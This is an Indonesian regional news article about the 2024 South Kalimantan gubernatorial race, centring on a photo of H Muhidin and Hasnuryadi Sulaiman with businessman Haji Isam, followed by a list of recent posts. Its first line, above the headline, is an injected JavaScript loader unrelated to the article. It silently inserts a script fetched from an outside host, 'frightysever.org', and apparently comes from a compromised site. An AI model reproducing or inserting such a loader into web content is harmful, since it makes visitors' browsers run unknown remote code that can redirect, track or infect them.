(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Sinyal H Muhidin-Hasnur di Pilgub Kalsel dari Foto ‘Kemesraan Politik’ Mengapit Crazy Rich HI


KANALKALIMANTAN.COM, BANJARMASIN – Kontestasi Pemilihan Kepada Daerah (Pilkada) 2024 di Kalimantan Selatan, mulai terlihat mengerucut tampilkan calon berpasangan, meski tensi politik masih cair sebelum resmi pendaftaran.

Sejumlah tokoh potensial setengah dipastikan maju dalam Pilgub Kalsel 2024 mulai melakukan komunikasi politik yang intens.

Teranyar beredar foto ‘kemesraan politik’ menunjukan kedekatan antara Ketua Umum DPW Partai Amanat Nasional (PAN) Kalsel H Muhidin bersama politisi Golkar Kalsel Hasnuryadi Sulaiman -anggota DPR RI Kalsel- menyita perhatian.

Menariknya dalam foto tersebut H Muhidin-Hasnur mengapit crazy rich Tanah Air dari Kabupaten Tanah Bumbu Andi Syamsudin Arsyad alias Haji Isam (HI). Posisi HI berada di tengah-tengah sambil menggenggam tangan Muhidin dan Hasnur –biasa disapa- seolah mengisyaratkan dukungan.

Baca juga: 9 Rumah di Gang Kenari Banjarmasin Habis Dilahap Si Merah

Perihal foto ‘kemesraan politik’ bersama crazy rich itu, Wakil Ketua Umum DPW PAN Kalsel, Afrizal membenarkan ada pertemuan antara H Muhidin, Hasnur, dan Haji Isam. Pertemuan ketiga tokoh tersebut berlangsung pada Selasa (23/4/2024) kemaren di Jakarta.

Afrizal juga mengaku hadir pada pertemuan itu mendampingi Ketua Umum DPW PAN dan turut mengunggah salah satu foto momen pertemuan dengan caption “InsyaAllah MH2024”.

Afrizal membeberkan, dalam pertemuan itu dibahas langkah politik menghadapi Pilgub Kalsel 2024. Ia mengklaim H Muhidin dan Hasnur telah mendapatkan dukungan dari Haji Isam untuk maju pada kontestasi tersebut.

“Alhamdulillah Haji Muhidin dan pak Hasnuryadi mendapatkan dukungan dan restu dari pak Haji Isam, untuk didorong agar maju sebagai calon Gubernur dan Wakil Gubernur Kalimantan Selatan,” kata Afrizal.

Baca juga: Tipu-tipu Investasi BBM Solar Istri Polisi di Banjarbaru Resmi Ditahan Polisi

Anggota DPRD Kota Banjarmasin ini juga membeberkan jika pada pertemuan itu, Haji Isam melihat H Muhidin dan Hasnur mempunyai banyak kecocokan.

Apalagi menurut Afrizal kedua tokoh tersebut juga dikenal dekat dengan para ulama dan peduli terhadap kehidupan sosial masyarakat.

“Beliau (Haji Isam) melihat pasangan Haji Muhidin dan Hansur ini banyak kecocokan, yang mana kecocokan ini diharapkan dapat membawa kebaikan bagi pemerintahan di Provinsi Kalimantan Selatan kedepan,” sebutnya.

Diketahui H Muhidin saat ini masih mejabat sebagai Wakil Gubernur Kalsel 2020-2024. Ketua DPW PAN Kalsel ini terpilih pada Pilkada 2020 berdampingan dengan H Sahbirin Noor. Belakangan namanya juga sering disebut-sebut berpotensi maju sebagai bakal calon Gubernur Kalsel pada Pilkada 2024.

Sementara Hasnur diketahui pada Pemilu 2024 kembali meraih kursi Anggota DPR RI dari Dapil Kalsel II periode 2024-2029. Anak dari almarhum H A Sulaiman HB ini juga dikenal luas di kalangan masyarakat yang juga sebagai CEO Barito Putra.

Selain H Muhidin dan Hasnur, beberapa nama juga muncul sebagai tokoh potensial yang akan bertarung pada kontestasi Pilgub Kalsel 2024.

Mereka bukan hanya tokoh dari partai politik, melainkan juga ada dari kalangan birokrat.

Salah satu nama diantara Rifqinizamy Karsayuda yang belum lama tadi memutuskan hijrah ke partai NasDem. Caleg terpilih DPR RI Dapil Kalsel 1 ini belakangan melalui akun media sosialnya sering memberikan kode untuk maju sebagai bakal calon Gubernur Kalsel.

Berikutnya nama Hj Raudhatul Jannah alias Acil Odah semakin digaungkan untuk bertarung pada kontestasi Pilkada Kalsel 2024.

Meski tidak memiliki KTA Golkar dan berstatus ASN, Ketua TP PKK Provinsi Kalsel sekaligus Kepala Dinas Kesehatan Provinsi Kalsel ini belakangan masuk dalam bursa calon Gubernur dari partai Golkar. Bahkan ia disebut berada diurutan teratas survei internal partai Golkar Kalsel.

Selain nama-nama diatas, nama Walikota Banjarmasin Ibnu Sina, Bupati Tanah Bumbu Zairullah Azhar, hingga Anggota DPRD Kalsel Rosehan NB juga mencuatnya setelah muncul pada hasil survei LSPP untuk harapan calon Gubernur Kalsel periode 2024-2029.(Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

47 menit ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

1 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

2 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

6 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

9 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

9 jam ago

This website uses cookies.